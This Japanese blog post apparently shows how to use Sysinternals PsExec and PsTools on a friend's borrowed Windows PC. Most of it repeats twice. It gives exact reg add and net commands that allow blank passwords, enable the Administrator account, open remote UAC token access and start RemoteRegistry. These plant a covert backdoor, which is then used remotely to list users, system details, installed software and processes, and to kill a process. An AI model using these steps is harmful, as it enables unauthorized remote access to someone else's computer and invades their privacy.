PsExecはWindows Sysinternals上で提供されているPsToolsというツール群の中の一つで、
リモートホスト上のプログラムを実行する公式ハッキングツールのようなもの。
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
友達にちょっとPC貸してーつって
Windows最強の脆弱性「右クリック→管理者として実行」でcmdを起動
> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0
> net user Administrator /active:yes
> net start RemoteRegistry
やっぱ返すーつって
コマンドの意味は上から
・WinVista以降の共有リソースの利用を可能にするレジストリ操作
・空パスワードを許可
・Administratorアカウントを有効化
・PsExecで必要なリモートレジストリサービスを開始
そしたらクライアントからPsExecでリモートホストのAdministrator権限で動くcmd.exeが取れる
> nbtstat -A 10.10.0.1
> PsExec -u Administrator -p "" \\ghost cmd
ついでにPsToolsに入ってるツールの中で便利そうなものを使ってみた
PsLoggedon.exe - システムにログイン中のユーザとログインした時刻を表示
> net use \\ghost\ipc$ /user:administrator ""
> PsLoggedon \\ghost
PsInfo.exe - システム情報ビューワ
-sオプションをつけるとインストールされているエロゲのタイトルまで表示される
> PsInfo -s -u Administrator -p "" \\ghost
PsList.exe - プロセス情報ビューワ
> PsList -t -u administrator -p "" \\ghost
PsKill.exe - プロセスキラー
> PsKill -t -u administrator -p "" 1184 \\ghost
リモートホスト上のプログラムを実行する公式ハッキングツールのようなもの。
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
友達にちょっとPC貸してーつって
Windows最強の脆弱性「右クリック→管理者として実行」でcmdを起動
> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0
> net user Administrator /active:yes
> net start RemoteRegistry
やっぱ返すーつって
コマンドの意味は上から
・WinVista以降の共有リソースの利用を可能にするレジストリ操作
・空パスワードを許可
・Administratorアカウントを有効化
・PsExecで必要なリモートレジストリサービスを開始
そしたらクライアントからPsExecでリモートホストのAdministrator権限で動くcmd.exeが取れる
> nbtstat -A 10.10.0.1
> PsExec -u Administrator -p "" \\ghost cmd
ついでにPsToolsに入ってるツールの中で便利そうなものを使ってみた
PsLoggedon.exe - システムにログイン中のユーザとログインした時刻を表示
> net use \\ghost\ipc$ /user:administrator ""
> PsLoggedon \\ghost
Users logged on locally:
2011/12/15 19:04:22 GHOST\root
Users logged on via resource shares:
2011/12/15 21:37:54 \\ghost\administrator
PsInfo.exe - システム情報ビューワ
-sオプションをつけるとインストールされているエロゲのタイトルまで表示される
> PsInfo -s -u Administrator -p "" \\ghost
System information for \\ghost:
Uptime: 0 days 2 hours 13 minutes 38 seconds
Kernel version: Windows 7 Starter, Multiprocessor Free
Product type: Professional
Product version: 6.1
Service pack: 1
Kernel build number: 7601
Registered organization:
Registered owner: root
IE version: 9.0000
System root: C:\windows
Processors: 2
Processor speed: 1.6 GHz
Processor type: Intel(R) Atom(TM) CPU N455 @
Physical memory: 1014 MB
Video driver: Intel(R) Graphics Media Accelerator 3150
Adobe AIR
Atheros Client Installation Program
Broadcom Wireless Network Adapter
CCleaner
:
PsList.exe - プロセス情報ビューワ
> PsList -t -u administrator -p "" \\ghost
Process information for ghost:
Name Pid Pri Thd Hnd VM WS Priv
Idle 0 0 2 0 0 24 0
System 4 8 114 773 3488 660 52
smss 284 11 2 31 4080 564 264
csrss 404 13 9 382 49864 3880 1296
wininit 444 13 3 83 41108 3212 1532
services 544 9 7 205 29652 5420 4364
svchost 668 8 9 358 31152 5440 2840
WmiPrvSE 2380 8 5 111 23896 4520 1708
svchost 744 8 7 255 27100 5044 3696
svchost 812 8 21 533 63572 10800 14276
:
PsKill.exe - プロセスキラー
> PsKill -t -u administrator -p "" 1184 \\ghost
Process 1184 on ghost killed.ghost...
- 関連記事
-
-
telnetの設定,管理はtlntadmnコマンドで
2012/02/03
-
WindowsでイーサネットのMACアドレスを変更してみる
2012/01/04
-
PsExec
2011/12/15
-
netコマンドでアカウント管理
2011/10/01
-
Windows7でtelnetしよう
2011/08/17
-
